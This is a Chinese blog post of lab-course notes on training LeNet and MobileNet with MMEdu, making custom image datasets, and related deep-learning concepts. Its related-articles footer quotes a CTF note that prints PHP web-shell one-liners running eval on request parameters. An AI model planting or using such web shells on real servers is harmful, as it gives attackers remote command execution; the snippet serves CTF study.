0207深度学习:构建个性化 ImageNet 数据集的 LeNet 和 MobileNet 实践

news/2025/2/7 23:07:03/文章来源:https://www.cnblogs.com/flyingsir/p/18703460

 

2月7日,晚上,19:30~21:00(主讲老师:郑祥)
实验内容:

【深度学习】训练常见的卷积神经网络模型

如LeNet和MobileNet,能制作个性化的ImageNet数据集,涉及到MMEdu、EasyTrain等工具。

 

  【2/6 19:00】二阶段直播接入和一阶段直播方式一样。接入方式请参考一阶段内容:
【2/5 09:30 关于二阶段实验课程时间的通知】
二阶段AI实验课程,将于2月6日开始。具体时间安排如下,直播方式和一阶段上课保持一致:
- 2月6日,晚上,19:30~21:00(主讲老师:刘正云)
实验内容:【机器学习】搭建算法并训练线性回归、多项式回归、支持向量机(SVM)等机器学习模型,制作个性化数据集,涉及到BaseML、BaseDT等工具。
- 2月7日,晚上,19:30~21:00(主讲老师:郑祥)
实验内容:【深度学习】训练常见的卷积神经网络模型,如LeNet和MobileNet,能制作个性化的ImageNet数据集,涉及到MMEdu、EasyTrain等工具。
- 2月8日,晚上,19:30~21:00(主讲老师:邱奕盛)
实验内容:【模型部署】利用统一推理框架实现模型部署。在训练好的模型基础上,设计简洁的体验界面,最终尝试在行空板上实现完整效果的呈现,涉及XEduHub、PySimpleGUI、PySimpleGUIWeb等工具。
 

更多的Xeduhub 资料 可以参考 : https://xedu.readthedocs.io/zh-cn/master/xedu_hub/introduction.html

线上环境登录地址;http://site01.openhydra.net:30012/login

 

 

 http://yun.wzsz.com:5000/d/s/123vQJiZVgBsZ6pTAvzRxj3RgMKV1Czg/ov8XD3bBqUMDCpEh8mOwxnPbAencrr58-Qb3gXtwFCQw

 

 

/root/anaconda3/envs/3.8/lib/python3.8/site-packages/tqdm/auto.py:22: TqdmWarning: IProgress not found. Please update jupyter and ipywidgets. See https://ipywidgets.readthedocs.io/en/stable/user_install.htmlfrom .autonotebook import tqdm as notebook_tqdm


pip install --upgrade jupyter ipywidgetsconda install -c conda-forge jupyter ipywidgets

  cuda 训练

 

配置路径要修改。


 

 训练

 

# 导入库文件,用别名让代码变得简洁
from MMEdu import MMClassification as mmeducls# 实例化模型,不指定参数即使用默认参数。
model = mmeducls('LeNet') # 指定数据集中的类别数量
model.num_classes = 10
# 从指定数据集路径中加载数据
model.load_dataset(path='mnist') 
# 设置模型的保存路径
model.save_fold = 'mycheckpoints' 
# 设置预训练模型路径
#checkpoint='./checkpoint/lenet_pretrain.pth'# 设定训练的epoch次数以及是否进行评估
model.train(epochs=10, validate=True,lr=0.01,device='cuda') 

  

 

 

 

 推理

# 用别名让代码变得简洁
from MMEdu import MMClassification as mmeducls# 指定进行推理的一组图片的路径
img = 'testdata/20.jpg' 
# 实例化MMEdu图像分类模型
model = mmeducls('LeNet')
# 指定使用的模型权重文件
checkpoint='mycheckpoints/best_accuracy_top-5_epoch_10.pth' 
# 在CPU上进行推理
result = model.inference(image=img, show=True,device='cuda', checkpoint=checkpoint)
# 输出结果,可以修改参数show的值来决定是否需要显示结果图片,默认显示结果图片
model.print_result(result) 

  

 

 

语音,图像,视频等数据, 深度学习更方便,相对机器学习方便写。

 

深度学习流程类似

 神经网络

 

 神经元链接权重的调整

在线训练演示过程;  playground.tensorflow.org

 

 

 mobileNet 轻量级卷积网络

lenet 网络。 

 

LeNet 和 MobileNet:轻量级卷积网络的讲解与选择

1. LeNet 网络

LeNet 是最早的卷积神经网络之一,由 Yann LeCun 在 1998 年提出,主要用于手写数字识别(如 MNIST 数据集)。它是一个简单的卷积网络,包含几个卷积层和池化层,最后接几个全连接层。
结构:
  • 输入层:28x28 的灰度图像。
  • 卷积层 1:6 个 5x5 的卷积核,输出 24x24 的特征图。
  • 池化层 1:2x2 的最大池化,输出 12x12 的特征图。
  • 卷积层 2:16 个 5x5 的卷积核,输出 8x8 的特征图。
  • 池化层 2:2x2 的最大池化,输出 4x4 的特征图。
  • 全连接层 1:120 个神经元。
  • 全连接层 2:84 个神经元。
  • 输出层:10 个神经元(对应 10 个数字类别)。
特点:
  • 简单高效:LeNet 是一个非常简单的网络,适合初学者理解和实现。
  • 历史意义:它是卷积神经网络的先驱,为后续的深度学习模型奠定了基础。
适用场景:
  • 小规模图像分类:适用于像 MNIST 这样的小规模图像分类任务。
  • 教学和研究:由于其简单性,常用于教学和研究中的基础模型。

2. MobileNet 网络

MobileNet 是一种轻量级的卷积神经网络,由 Google 在 2017 年提出,主要用于移动设备和嵌入式系统。它通过使用深度可分离卷积(Depthwise Separable Convolution)来减少计算量和参数数量,同时保持较高的准确率。
结构:
  • 深度可分离卷积:将标准卷积分解为两个独立的步骤:深度卷积(Depthwise Convolution)和逐点卷积(Pointwise Convolution)。
    • 深度卷积:对每个输入通道分别进行卷积操作。
    • 逐点卷积:使用 1x1 卷积核对深度卷积的输出进行通道混合。
  • 结构:MobileNet 通常包含多个深度可分离卷积层,每个层后接一个批量归一化(Batch Normalization)和 ReLU 激活函数。
  • 变体:MobileNet 有多个变体,如 MobileNet V1、MobileNet V2 和 MobileNet V3,每个变体在结构和性能上都有所改进。
特点:
  • 轻量级:计算量和参数数量少,适合在资源受限的设备上运行。
  • 高效:通过深度可分离卷积减少了计算复杂度,同时保持了较高的准确率。
  • 灵活性:可以通过调整宽度乘数(Width Multiplier)来控制模型的大小和计算量。
适用场景:
  • 移动设备:适用于在移动设备上运行的图像分类、目标检测等任务。
  • 嵌入式系统:适用于资源受限的嵌入式系统,如智能摄像头、物联网设备等。

如何选择

  • 任务需求:
    • 如果任务是简单的图像分类,且数据集较小(如 MNIST),可以选择 LeNet。
    • 如果任务需要在移动设备或嵌入式系统上运行,且对计算资源有限制,可以选择 MobileNet。
  • 模型复杂度:
    • LeNet 结构简单,适合初学者学习和实现。
    • MobileNet 结构复杂,但效率高,适合实际应用。
  • 性能需求:
    • 如果对模型的准确率要求较高,可以选择 MobileNet,因为它在保持轻量级的同时,能够提供较高的准确率。
    • 如果对模型的准确率要求不高,可以选择 LeNet,因为它实现简单,易于理解和调试。

如何理解和使用

1. 理解

  • LeNet:
    • 卷积层:提取图像的局部特征。
    • 池化层:减少特征图的尺寸,降低计算量。
    • 全连接层:对提取的特征进行分类。
  • MobileNet:
    • 深度可分离卷积:将标准卷积分解为两个独立的步骤,减少计算量和参数数量。
    • 批量归一化:加速训练过程,提高模型的稳定性。
    • ReLU 激活函数:引入非线性,使模型能够学习复杂的特征。

2. 使用

  • LeNet:
    • 使用 Python 和 TensorFlow/Keras 实现:
      Python复制
      import tensorflow as tf
      from tensorflow.keras import layers, modelsmodel = models.Sequential([layers.Conv2D(6, (5, 5), activation='relu', input_shape=(28, 28, 1)),layers.MaxPooling2D((2, 2)),layers.Conv2D(16, (5, 5), activation='relu'),layers.MaxPooling2D((2, 2)),layers.Flatten(),layers.Dense(120, activation='relu'),layers.Dense(84, activation='relu'),layers.Dense(10, activation='softmax')
      ])model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
  • MobileNet:
    • 使用 TensorFlow/Keras 预训练模型:
      Python复制
      import tensorflow as tf
      from tensorflow.keras.applications import MobileNetV2
      from tensorflow.keras import layers, modelsbase_model = MobileNetV2(weights='imagenet', include_top=False, input_shape=(224, 224, 3))model = models.Sequential([base_model,layers.GlobalAveragePooling2D(),layers.Dense(1024, activation='relu'),layers.Dense(10, activation='softmax')
      ])model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])

总结

  • LeNet 是一个简单的卷积网络,适合初学者和小规模图像分类任务。
  • MobileNet 是一个轻量级的卷积网络,适合在移动设备和嵌入式系统上运行,具有高效性和灵活性。
  • 根据任务需求、模型复杂度和性能需求选择合适的网络。

 

 

 mmedu计算机视觉库

 

 

 

 

训练代码

https://xedu.readthedocs.io/zh-cn/master/mmedu/installation.html#mmedu-cpu

 

 

 推理过程

 

权重文件pth,和模型文件一样么,是一个东西的不同名字吗。还是不同的文件。 为什么扩展名有的是pth有的onnx。

 

权重文件(如 .pth)和模型文件(如 .onnx)是不同的文件,它们有不同的用途和格式。以下是对这两种文件的详细解释:

1. 权重文件(.pth 或 .pt

权重文件通常包含模型的参数(权重和偏置),但不包含模型的结构。它是 PyTorch 模型训练后保存的文件,主要用于在 PyTorch 环境中加载模型参数。

特点:

  • 格式:通常是 PyTorch 的二进制格式。
  • 用途:用于在 PyTorch 中加载模型参数,以便进行推理或继续训练。
  • 加载方法:
    Python复制
    import torch
    model = MyModel()  # 定义模型结构
    model.load_state_dict(torch.load('model.pth'))

2. 模型文件(.onnx

ONNX(Open Neural Network Exchange)文件是一种开放的模型格式,用于在不同的深度学习框架之间交换和部署模型。.onnx 文件不仅包含模型的参数,还包含模型的结构和计算图。

特点:

  • 格式:ONNX 是一种标准化的模型格式,支持多种深度学习框架(如 PyTorch、TensorFlow、MXNet 等)。
  • 用途:用于在不同的框架之间共享模型,以及在生产环境中进行高效推理。
  • 加载方法:
    Python复制
    import onnxruntime as ort
    session = ort.InferenceSession('model.onnx')

为什么扩展名不同?

  • .pth.pt:这些扩展名通常用于 PyTorch 的权重文件。它们是 PyTorch 的内部格式,主要用于在 PyTorch 环境中加载和使用模型参数。
  • .onnx:这个扩展名用于 ONNX 文件。ONNX 是一个跨框架的模型格式,旨在促进模型在不同框架之间的互操作性。

如何将 PyTorch 模型转换为 ONNX 格式?

你可以使用 PyTorch 提供的工具将 .pth 文件转换为 .onnx 文件,以便在其他框架中使用。以下是转换的示例代码:
Python复制
import torch
import torch.onnx# 定义模型结构
class MyModel(torch.nn.Module):def __init__(self):super(MyModel, self).__init__()self.conv1 = torch.nn.Conv2d(1, 6, 5)self.pool = torch.nn.MaxPool2d(2, 2)self.conv2 = torch.nn.Conv2d(6, 16, 5)self.fc1 = torch.nn.Linear(16 * 5 * 5, 120)self.fc2 = torch.nn.Linear(120, 84)self.fc3 = torch.nn.Linear(84, 10)def forward(self, x):x = self.pool(torch.nn.functional.relu(self.conv1(x)))x = self.pool(torch.nn.functional.relu(self.conv2(x)))x = x.view(-1, 16 * 5 * 5)x = torch.nn.functional.relu(self.fc1(x))x = torch.nn.functional.relu(self.fc2(x))x = self.fc3(x)return x# 加载权重
model = MyModel()
model.load_state_dict(torch.load('model.pth'))# 准备一个输入张量
dummy_input = torch.randn(1, 1, 28, 28)# 导出为 ONNX 格式
torch.onnx.export(model, dummy_input, 'model.onnx', input_names=['input'], output_names=['output'])

总结

  • 权重文件(.pth.pt):包含模型的参数,用于在 PyTorch 中加载和使用。
  • 模型文件(.onnx):包含模型的参数和结构,用于跨框架共享和高效推理。
  • 转换:可以使用 PyTorch 的 torch.onnx.export 方法将 .pth 文件转换为 .onnx 文件。
希望这些信息能帮助你更好地理解这两种文件的区别和用途。
 

 手写数字识别

 classses 分类文件

对应验证;  val_set

 

 

 

在机器学习和深度学习中,拟合(Fitting)和过拟合(Overfitting)是两个非常重要的概念。它们描述了模型在训练数据上的学习效果以及模型的泛化能力。

1. 拟合(Fitting)

拟合是指模型学习训练数据的过程,目标是使模型能够准确地预测训练数据的输出。根据拟合的程度,可以分为以下几种情况:
  • 欠拟合(Underfitting):
    • 定义:模型在训练数据上的表现不佳,无法准确捕捉数据中的规律。
    • 原因:模型过于简单,无法捕捉数据中的复杂关系;训练时间不足;特征选择不当等。
    • 表现:训练误差和验证误差都较高。
    • 解决方法:
      • 增加模型的复杂度(如增加层数、增加神经元数量)。
      • 增加训练时间。
      • 添加更多特征或选择更好的特征。
      • 使用更复杂的模型(如从线性模型改为非线性模型)。
  • 良好拟合(Good Fitting):
    • 定义:模型在训练数据上表现良好,能够准确捕捉数据中的规律,并且在验证数据上也有较好的表现。
    • 表现:训练误差和验证误差都较低,且两者之间的差距较小。
    • 目标:这是模型训练的理想状态,模型具有良好的泛化能力。

2. 过拟合(Overfitting)

过拟合是指模型在训练数据上表现得非常好,但在新的、未见过的数据上表现不佳。这是因为模型过于复杂,学习了训练数据中的噪声和细节,而不仅仅是数据中的真实规律。
  • 定义:模型在训练数据上表现非常好,但在验证数据上表现较差。
  • 原因:
    • 模型过于复杂(如层数过多、神经元数量过多)。
    • 训练数据量不足。
    • 训练数据中存在噪声或异常值。
    • 特征选择不当,模型学习了无关的特征。
  • 表现:
    • 训练误差非常低,但验证误差较高。
    • 模型在训练数据上拟合得非常好,但在新的数据上泛化能力差。
  • 解决方法:
    • 减少模型复杂度:
      • 减少层数或神经元数量。
      • 使用更简单的模型。
    • 增加训练数据量:
      • 收集更多的训练数据。
      • 使用数据增强技术(如图像旋转、缩放、裁剪等)。
    • 正则化:
      • 使用 L1 或 L2 正则化。
      • 使用 Dropout(在训练过程中随机丢弃一些神经元)。
    • 早停法(Early Stopping):
      • 在验证误差开始增加时停止训练。
    • 交叉验证:
      • 使用交叉验证来评估模型的泛化能力。
    • 特征选择:
      • 选择更有意义的特征,减少无关特征的影响。

3. 如何理解拟合和过拟合

  • 拟合是模型学习训练数据的过程,目标是使模型能够准确预测训练数据的输出。
  • 过拟合是模型在训练数据上表现得非常好,但在新的数据上表现不佳的现象,通常是因为模型过于复杂,学习了训练数据中的噪声和细节。

4. 实际应用中的建议

  • 监控训练和验证误差:在训练过程中,同时监控训练误差和验证误差,确保模型在训练数据和验证数据上都有良好的表现。
  • 使用验证集:使用验证集来评估模型的泛化能力,避免在训练集上过度优化。
  • 正则化技术:使用正则化技术(如 L1/L2 正则化、Dropout)来防止过拟合。
  • 早停法:在验证误差开始增加时停止训练,避免过拟合。
  • 数据增强:使用数据增强技术来增加训练数据的多样性,提高模型的泛化能力。

示例代码

以下是一个简单的示例,展示如何在 PyTorch 中使用 Dropout 和早停法来防止过拟合:
Python复制
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
from sklearn.model_selection import train_test_split
from sklearn.datasets import make_classification
from sklearn.preprocessing import StandardScaler# 生成模拟数据
X, y = make_classification(n_samples=1000, n_features=20, n_informative=15, n_redundant=5, random_state=42)
X = StandardScaler().fit_transform(X)
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2, random_state=42)# 转换为 PyTorch 数据集
train_data = TensorDataset(torch.tensor(X_train, dtype=torch.float32), torch.tensor(y_train, dtype=torch.long))
val_data = TensorDataset(torch.tensor(X_val, dtype=torch.float32), torch.tensor(y_val, dtype=torch.long))
train_loader = DataLoader(train_data, batch_size=32, shuffle=True)
val_loader = DataLoader(val_data, batch_size=32, shuffle=False)# 定义模型
class MyModel(nn.Module):def __init__(self):super(MyModel, self).__init__()self.fc1 = nn.Linear(20, 128)self.fc2 = nn.Linear(128, 64)self.fc3 = nn.Linear(64, 1)self.dropout = nn.Dropout(0.5)def forward(self, x):x = torch.relu(self.fc1(x))x = self.dropout(x)x = torch.relu(self.fc2(x))x = self.dropout(x)x = torch.sigmoid(self.fc3(x))return xmodel = MyModel()
criterion = nn.BCELoss()
optimizer = optim.Adam(model.parameters(), lr=0.001)# 训练模型
best_val_loss = float('inf')
early_stopping_patience = 10
patience_counter = 0for epoch in range(100):model.train()for inputs, targets in train_loader:optimizer.zero_grad()outputs = model(inputs)loss = criterion(outputs.squeeze(), targets.float())loss.backward()optimizer.step()model.eval()val_loss = 0with torch.no_grad():for inputs, targets in val_loader:outputs = model(inputs)loss = criterion(outputs.squeeze(), targets.float())val_loss += loss.item()val_loss /= len(val_loader)print(f'Epoch [{epoch+1}/100], Validation Loss: {val_loss:.4f}')if val_loss < best_val_loss:best_val_loss = val_losspatience_counter = 0else:patience_counter += 1if patience_counter >= early_stopping_patience:print('Early stopping triggered')break

总结

  • 拟合是模型学习训练数据的过程,目标是使模型能够准确预测训练数据的输出。
  • 过拟合是模型在训练数据上表现得非常好,但在新的数据上表现不佳的现象,通常是因为模型过于复杂,学习了训练数据中的噪声和细节。
  • 解决过拟合的方法包括减少模型复杂度、增加训练数据量、使用正则化技术、早停法和数据增强等。

 

 

   
   
   
   
   
   
 

 昆虫识别

 

 

 

 

预训练模型(Pre-trained Model)是指在一个大型数据集上预先训练好的模型,通常用于迁移学习(Transfer Learning)。预训练模型的参数可以作为初始参数,用于在新的、较小的数据集上进行微调(Fine-tuning)。这种方法可以显著提高模型的性能,尤其是在数据量有限的情况下。

预训练模型的作用

  1. 迁移学习:
    • 定义:迁移学习是指将一个在大规模数据集上训练好的模型的参数迁移到一个新的任务上,以提高模型在新任务上的性能。
    • 优点:可以利用预训练模型在大规模数据集上学到的特征表示,减少在新任务上的训练时间,提高模型的泛化能力。
  2. 初始化参数:
    • 定义:预训练模型的参数可以作为初始参数,用于在新的数据集上进行微调。
    • 优点:避免从随机初始化开始训练,减少训练时间,提高模型的收敛速度。
  3. 特征提取:
    • 定义:预训练模型的特征提取层可以提取通用的特征,这些特征在新的任务中仍然有效。
    • 优点:提高模型在新任务上的性能,尤其是在数据量有限的情况下。

代码中的预训练模型路径

在你的代码中,checkpoint='checkpoint/mobilenet_1k_pretrain.pth' 指定了预训练模型的路径。这个路径指向一个包含预训练模型参数的文件(通常是 .pth.pt 文件)。这些参数将被加载到模型中,作为初始参数进行微调。

代码解析

Python复制
# 设置预训练模型路径
checkpoint='checkpoint/mobilenet_1k_pretrain.pth'# 设定训练的epoch次数以及是否进行评估
model.train(epochs=10, validate=True, lr=0.01, device='cuda', checkpoint=checkpoint)
  • checkpoint 参数:
    • 这个参数指定了预训练模型的路径。在训练过程中,模型会加载这个路径中的参数作为初始参数。
    • 如果不指定 checkpoint 参数,模型将从随机初始化的参数开始训练。

为什么使用预训练模型

  1. 数据量有限:
    • 如果你的数据集较小,直接从随机初始化开始训练可能会导致过拟合,而使用预训练模型可以提高模型的泛化能力。
  2. 计算资源有限:
    • 训练一个大型模型需要大量的计算资源和时间。使用预训练模型可以减少训练时间,提高效率。
  3. 特征提取:
    • 预训练模型在大规模数据集上学到的特征表示通常对新的任务仍然有效,可以提高模型的性能。

如何选择预训练模型

  1. 任务相关性:
    • 选择与你的任务相关的预训练模型。例如,如果你的任务是图像分类,可以选择在 ImageNet 数据集上预训练的模型。
  2. 模型复杂度:
    • 选择适合你的任务和计算资源的模型。例如,MobileNet 是一个轻量级的模型,适合在移动设备和嵌入式系统上运行。
  3. 数据集大小:
    • 如果你的数据集较小,使用预训练模型可以提高模型的泛化能力。如果数据集较大,可以从随机初始化开始训练。

总结

  • 预训练模型:在大规模数据集上预先训练好的模型,可以用于迁移学习。
  • 作用:提高模型的性能,减少训练时间,提高泛化能力。
  • 代码中的 checkpoint 参数:指定了预训练模型的路径,模型会加载这些参数作为初始参数进行微调。
   
   

 

   

 

   
   
   
   

个性化数据集制作

   0207/

 

 

 

步骤2:设置参数,拆分并标注数据集

默认比例为训练集train_ratio = 0.8, 测试集test_ratio = 0.1, 验证集val_ratio = 0.1

 

# 导入库文件
from BaseDT.dataset import DataSet
# 指定为生成数据集的路径
ds = DataSet(r"/root/notebook/0207/zhengxiang/人工智能实验之深度学习/03拓展实验/kunchong5_cls") 
# 默认比例为训练集train_ratio = 0.8, 测试集test_ratio = 0.1, 验证集val_ratio = 0.1
# 指定原始数据集的路径,数据集格式选择IMAGENET
ds.make_dataset(r"/root/notebook/0207/zhengxiang/人工智能实验之深度学习/03拓展实验/kunchong5", src_format="IMAGENET",train_ratio = 0.8, test_ratio = 0.1, val_ratio = 0.1)

  

 

使用在线OpenHydra平台的老师注意:
## 特别注意:不要使用文件夹的名字 `checkpoints`, `checkpoint` 
各位同学在使用的时候请不要新建名为 `checkpoints`, `checkpoint` 等这些是 `jupyter lab` 的保留文件夹名字,会导致无法正常删除。【建议使用mycheckpoint 或者mycheckpoint】等字样。

   
 1. 手写数字  

 1. 提供了 图片数据及,和类型文件   letnet 

2. 使用 模型进行 学习 ,  得到权重文件,

3. 选择最好一轮的权重文件,  进行推理验证。 

 

 2. 昆虫识别 

  与手写数字类似

只是训练使用的  模型不一样   model net

 3. 训练数据集合的制作

 

  图片类型文件夹

目录索引 txt文件

 

使用baseDT 工具 ,生成  图片分类数据和文件

 

开始学习

推理。

   
 扩展               识别,中草药
 

 识别,飞鸟保护自然。

 

 

 

   
   
 可视化窗口的方式 训练  

 

 

   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
 

 提高手写数字 推理的置信度的 因素方法‘

要提高手写数字识别模型的推理置信度,可以从以下几个方面入手。这些方法不仅可以提高模型对单个样本的置信度,还可以提升模型的整体性能和泛化能力。

1. 数据预处理

确保输入数据的格式和训练数据一致,这包括图像的大小、归一化方式等。如果训练数据经过了特定的预处理步骤(如归一化、标准化),推理时也需要对输入数据进行相同的处理。
  • 图像大小:确保输入图像的大小与训练时一致。例如,如果训练时使用的是 28x28 的图像,推理时也应将输入图像调整为 28x28。
  • 归一化:如果训练时对图像像素值进行了归一化(如将像素值缩放到 [0, 1] 或 [-1, 1]),推理时也需要进行相同的归一化处理。

2. 模型优化

选择合适的模型架构和优化方法,可以提高模型的性能和置信度。
  • 模型架构:选择适合任务的模型架构。对于手写数字识别,简单的卷积神经网络(如 LeNet)通常表现良好。如果需要更高的准确率,可以尝试更复杂的模型(如 MobileNet 或 ResNet)。
  • 训练策略:使用适当的学习率、优化器和损失函数。例如,使用 Adam 优化器和交叉熵损失函数通常在分类任务中表现良好。
  • 正则化:使用 Dropout、L2 正则化等技术可以防止过拟合,提高模型的泛化能力。

3. 数据增强

通过数据增强技术增加训练数据的多样性,可以提高模型的鲁棒性和置信度。
  • 旋转:对训练数据进行随机旋转,使模型能够更好地处理不同角度的数字。
  • 缩放:对训练数据进行随机缩放,使模型能够更好地处理不同大小的数字。
  • 平移:对训练数据进行随机平移,使模型能够更好地处理数字在图像中的不同位置。
  • 噪声:在训练数据中添加噪声,使模型能够更好地处理实际输入中的噪声。

4. 后处理

对模型的输出进行后处理,可以提高置信度。
  • Softmax:使用 Softmax 函数将模型的输出转换为概率分布,选择概率最高的类别作为预测结果。
  • 置信度阈值:设置一个置信度阈值,只有当模型的置信度高于该阈值时,才认为预测结果是可靠的。如果置信度低于阈值,可以提示用户重新输入或进行进一步的处理。

5. 实际操作步骤

以下是一个具体的例子,展示如何提高手写数字识别模型的推理置信度:

1. 数据预处理

确保输入图像的大小和归一化方式与训练数据一致。
Python复制
import cv2
import numpy as npdef preprocess_image(image_path):# 读取图像image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)# 调整图像大小image = cv2.resize(image, (28, 28))# 归一化image = image / 255.0# 转换为模型输入格式image = image.reshape(1, 28, 28, 1)return image

2. 加载模型

加载训练好的模型。
Python复制
import tensorflow as tfmodel = tf.keras.models.load_model('model.h5')

3. 推理

对输入图像进行推理,并获取置信度。
Python复制
def predict_image(image_path):# 预处理图像image = preprocess_image(image_path)# 推理predictions = model.predict(image)# 获取置信度最高的类别predicted_class = np.argmax(predictions, axis=1)confidence = np.max(predictions)return predicted_class, confidence# 测试
image_path = 'handwritten_digit.png'
predicted_class, confidence = predict_image(image_path)
print(f'Predicted class: {predicted_class[0]}, Confidence: {confidence:.4f}')

影响置信度的因素

  1. 数据质量:训练数据的质量直接影响模型的性能。如果训练数据包含噪声或标注错误,模型的置信度可能会降低。
  2. 模型复杂度:模型过于简单可能导致欠拟合,模型过于复杂可能导致过拟合。选择合适的模型复杂度可以提高置信度。
  3. 训练时间:训练时间不足可能导致模型未充分学习数据中的规律。适当增加训练时间可以提高模型的性能。
  4. 正则化:适当的正则化技术可以防止过拟合,提高模型的泛化能力。
  5. 数据增强:数据增强可以增加训练数据的多样性,提高模型的鲁棒性和置信度。
  6. 输入数据的预处理:确保输入数据的格式和训练数据一致,可以提高模型的置信度。
   

EasyDL系列

如LeNet和MobileNet,能制作个性化的ImageNet数据集,涉及到MMEdu、EasyTrain等工具。
MMEdu

https://xedu.readthedocs.io/zh-cn/master/mmedu.html

 

https://xedu.readthedocs.io/zh-cn/master/mmedu/installation.html#mmedu-cpu

 

 

 

   
   

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/880274.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

注解反射之通过Class对象来操作对象的属性和方法

代码如下package com.loubin;import java.lang.annotation.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method;public class Main {public static void main(S…

百度网盘的闲时下载卡入口

https://baijiahao.baidu.com/s?id=1820111080013395787&wfr=spider&for=pc 百度网盘的闲时下载卡入口首先,需要明确是,闲时下载卡的使用时间是01:00-09:00。闲时下载卡的使用时间是01:00-09:00其次,是电脑端的入口。1.在下载界面点击“立即提速”点击箭头指示…

2025年夸克网盘1TB免费空间领取教程,轻松扩容你的网盘

今天为大家带来的是2025年夸克网盘1TB免费空间领取教程,轻松扩容你的网盘。大家好呀!这里是专注为大家挖掘各种超值福利的小助手!你是不是也有过这样的烦恼——网盘存储空间不够用,电影、照片、文件放得满满的,完全没有余地?今天我要给大家带来一个超实用的福利,夸克网盘…

Duplicate Cleaner : 这款神器一键干掉重复文件

在如今这个数字时代,我们的电脑里存储着海量的文件。随着时间的推移,重复文件也越来越多,不仅占用宝贵的磁盘空间,还会让文件管理变得一团糟。 今天,就给大家介绍一款能轻松解决这一难题的神器 ——Duplicate Cleaner。Duplicate Cleaner 有普通版和功能更强大的 Pro 版。…

Doggo:一款友好的命令行DNS查询工具

一、基本概述 Doggo是由Karan Sharma使用Go语言开发的现代命令行DNS客户端工具,旨在以简洁、直观的方式输出DNS查询结果。它类似于传统的dig命令,但提供了更为现代化和易读的输出格式。 https://github.com/mr-karan/doggo二、主要特点 1、支持多种协议: Doggo不仅支持传统的…

uniapp 移动端(ios)uview2.0 u-input 插槽问题

这个插槽太奇怪了,非得加上对于的属性才能使用。<u-input class="u-input" prefixIcon="search" suffix-icon="search" placeholder="请输入验证码" type="text" border="surround"color="#fffffff0&quo…

DeepSeek-R1 技术全景解析:从原理到实践的“炼金术配方” ——附多阶段训练流程图与核心误区澄清

字数:约3200字|预计阅读时间:8分钟(调试着R1的API接口,看着控制台瀑布般流淌的思维链日志)此刻我仿佛看到AlphaGo的棋谱在代码世界重生——这是属于推理模型的AlphaZero时刻。 DeepSeek 发布的 V3、R1-Zero、R1 三大模型,代表了一条从通用基座到专用推理的完整技术路径。…

注解反射之获得Class对象

获得Class对象是实现反射的基础,获得Class对象主要有三种方式 下面是具体实例package com.loubin;import java.lang.annotation.*;public class Main {public static void main(String[] args) throws ClassNotFoundException {Class c = User.class;User user = new User();…

注解反射之获得Class对象介绍

啥是Class对象 专业的详细的科学的规范的解释百度就可以获得,这里写能让自己直观理解的介绍吧。当我们运行程序时,系统会将类加载到内存,同时,会给每个类分配一个Class的对象,这个Class的对象拥有关于这个类的一切描述,就好像人的名片一样。每一个类对应一个唯一的Class对…

java面试心得体会

1.背景 大家有没有感觉到现在就算背诵了很多面试八股文,也刷了B站上很多的面试视频,绝大部分的面试题也基本上都能回答上,但是找工作却越来越难了,是因为自己没有学好么,当然不是很多人认为是经济不好,招聘的单位少,其实我个人觉得也不是最主要的原因估计是学习java编程的人太多…

注解反射之自定义注解

自定义注解主要是要掌握四个元注解@Target, @Retention,@Documented,@Inherited,他们的意思分别如下 下面是一个具体的例子,注意注释定义中的 String name()并不是定义一个name方法,而是定义一个name属性,该属性的类型是Stringpackage com.loubin;import java.lang.ann…

【CTF笔记】文件上传漏洞

一、后门代码 1、一句话后门 <?php @eval($_get[cmd]); ?> <?php @eval($_request[cmd]);?> <script language="php">@eval($_post[cmd]);</script>注意,在PHP中配置 short_open_tag=on 时,图片中不能含有 <? ,有会影响PHP代码的…